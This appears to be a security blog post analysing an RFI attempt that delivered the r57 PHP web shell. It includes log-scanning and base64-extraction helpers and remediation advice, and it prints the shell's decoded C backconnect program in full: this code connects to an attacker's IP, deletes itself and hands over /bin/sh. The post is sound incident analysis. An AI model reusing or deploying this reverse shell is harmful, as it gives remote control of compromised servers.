Nasty RFI attempt
We saw a nasty RFI (remote file inclusion) attack attempt against a PHP application the other day. It tried to make the application include a script served as a .txt file from a remote server, the classic case of an attacker-supplied URL ending up in include(). We downloaded the file to analyze it, and it contains a lot of different features.
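To give a concrete picture of what such an attempt looks like on the receiving end, here is an added example (not part of the original post and not code from the shell) that scans Apache combined-format access-log lines for query parameters whose value is an absolute URL, which is exactly what a vulnerable include() would fetch. The log lines, IP addresses and the file name r57.txt in them are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (Apache combined format); not taken from the original post.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:10:14:22 +0100] "GET /index.php?page=http://198.51.100.9/r57.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Mar/2008:10:14:25 +0100] "GET /index.php?page=http%3A%2F%2F198.51.100.9%2Fr57.txt%00 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.44 - - [12/Mar/2008:10:15:01 +0100] "GET /index.php?page=about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.0.2.45 - - [12/Mar/2008:10:15:03 +0100] "GET /search.php?q=see+http://example.org/docs HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Pulls the request line out of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Only a value that *starts* with a scheme is something include() would fetch remotely;
# a URL mentioned in the middle of a search string (line 4) is not an inclusion attempt.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def rfi_parameters(target):
    """Return (name, value) pairs in the request target whose value is a remote URL.

    parse_qsl percent-decodes once, so %3A%2F%2F and %00 come back as ':', '//' and a
    NUL byte, and the trailing '?' the attacker appends survives in the value.
    """
    query = urlsplit(target).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def scan_log(text):
    """Return [(client_ip, param, url)] for every request carrying a remote-URL parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue  # malformed entry, skip
        client = line.split(" ", 1)[0]
        for name, value in rfi_parameters(m.group("target")):
            findings.append((client, name, value))
    return findings


if __name__ == "__main__":
    for client, name, url in scan_log(SAMPLE_LOG):
        print(f"{client} -> {name}={url!r}")
```

Two details in the sample are typical of these attempts: the payload is hosted as .txt so the attacker's own server hands out the PHP source instead of executing it, and the trailing `?` (or, on older PHP versions, a `%00`) neutralises whatever suffix the application appends to the parameter. The fix belongs in the application: never pass user input to include()/require(), keep allow_url_include off, and map the parameter onto a fixed list of local files.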
It’s called “LupuSheL R57 Shell” and it seems to have been active around the web for over two years. It claims to be written by 1dt.w0lf from RST/GHC.
The script was well over 100KB and most features were implemented in PHP. It supported English and Russian and was actually commented! The features ranged from download/upload of arbitrary files to dumping and exporting databases, whether MySQL, MSSQL, PostgreSQL or Oracle. It also displayed system information such as cpuinfo, memory and free disk space.
If the inclusion succeeded, opening the exploit URL could prompt for HTTP basic authentication, where both the username and password were the name of the script (“r57”). In the version we got this was disabled.
We also noticed some large base64-encoded sections. After decoding them, we found that the script contained a shell in both C and Perl versions, one for connecting back to the attacker (backconnect) and one for opening a listening port on the attacked server (bind shell). To use them, the PHP script would decode, compile and run the C version, or decode and run the Perl version. Below is the decoded C version of the backconnect script.
#include <stdio.h>
#include <stdlib.h>        /* atoi, exit, system */
#include <string.h>        /* strlen, strcat */
#include <strings.h>       /* bzero */
#include <unistd.h>        /* daemon, dup2, execl, close */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>     /* inet_addr */

/* Usage: ./backconnect <attacker ip> <port>
   Connects out to the attacker and hands over a shell on that socket. */
int main(int argc, char *argv[])
{
    int fd;
    struct sockaddr_in sin;
    char rms[21]="rm -f ";                /* 6 chars + NUL, the rest is for argv[0] */
    daemon(1,0);                          /* detach from the web server process */
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));   /* wipe ip and port from the command line shown by ps */
    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
    if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
        perror("[-] connect()");
        exit(0);
    }
    strcat(rms, argv[0]);                 /* unchecked: overflows rms if the binary's name is longer than 14 bytes */
    system(rms);                          /* delete its own binary from disk once connected */
    dup2(fd, 0);                          /* stdin, stdout and stderr all go to the socket */
    dup2(fd, 1);
    dup2(fd, 2);
    execl("/bin/sh","sh -i", NULL);       /* "sh -i" is only argv[0]; no real -i flag is passed */
    close(fd);
}
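To pull sections like these out of the shell source in one go, here is an added example (not part of the original post, and not the shell's own code) that finds long base64 strings assigned to PHP variables, decodes them and guesses from the first bytes whether each one is C source, Perl source or a compiled binary. The PHP snippet it runs against is constructed here from two tiny stubs, and the variable names $back_connect_c and $back_connect are assumed for illustration.

```python
import base64
import binascii
import re

# Constructed stand-in for the shell source: two base64 blobs assigned to PHP variables,
# built from small C/Perl stubs so the example runs offline. Not the real r57 payloads.
C_STUB = b'#include <stdio.h>\nint main(int argc,char*argv[]){return 0;}\n'
PERL_STUB = b'#!/usr/bin/perl\nuse Socket;\nsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\n'
SAMPLE_PHP = (
    '<?php\n'
    '$back_connect_c = "' + base64.b64encode(C_STUB).decode() + '";\n'
    '$back_connect   = "' + base64.b64encode(PERL_STUB).decode() + '";\n'
    '$lang = "eng"; $short = "c2hvcnQ=";\n'   # short strings are ignored by the length filter
    '?>'
)

# A PHP variable assigned a double-quoted string of at least 40 base64 characters
# (whitespace allowed, since long blobs are often wrapped across lines).
BLOB_RE = re.compile(r'\$(\w+)\s*=\s*"([A-Za-z0-9+/=\s]{40,})"')


def classify(data):
    """Guess what a decoded blob is from its leading bytes."""
    if data.startswith(b'#!') and b'perl' in data[:40].lower():
        return 'perl'
    if b'#include' in data[:200]:
        return 'c'
    if data.startswith(b'\x7fELF'):
        return 'elf'
    return 'unknown'


def extract_blobs(php_source):
    """Return [(var_name, kind, decoded_bytes)] for every decodable long base64 string."""
    found = []
    for var, b64 in BLOB_RE.findall(php_source):
        compact = re.sub(r'\s+', '', b64)
        try:
            data = base64.b64decode(compact, validate=True)
        except binascii.Error:
            continue  # looked like base64 but is not; skip it
        found.append((var, classify(data), data))
    return found


if __name__ == "__main__":
    for var, kind, data in extract_blobs(SAMPLE_PHP):
        print(f"${var}: {kind}, {len(data)} bytes")
        print(data.decode(errors="replace"))
```

Running this over a real shell gives the decoded sources (or binaries) to inspect before anything is compiled or executed, and the variable names tell you which feature in the PHP UI uses which blob.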
A funny thing I noticed is that one of the comments actually says “ANY MODIFIED REPUBLISHING IS RESTRICTED”. Like an attacker would care…
